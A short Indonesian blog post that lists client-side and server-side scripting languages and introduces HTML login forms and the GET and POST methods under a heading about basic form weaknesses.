Contoh scripting language yang bekerja di sisi client:
• JavaScript
• Client side VB Script
Adapun scripting language di sisi server:
• ASP (Active Server Pages)
• JSP (Java Server Pages)
• PHP (Personal Home Page)

Kelemahan Dasar HTML Form

  •  Formulir dalam format HTML (HTML Form) adalah tampilan yang digunakan untuk menampilkan jendela untuk memasukkan username dan password.
  • Setiap HTML form harus menggunakan salah satu metode pengisian formulir, yaitu GET atau POST. Melalui kedua metode HTTP ini (GET atau POST) parameter disampaikan ke aplikasi di sisi server.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s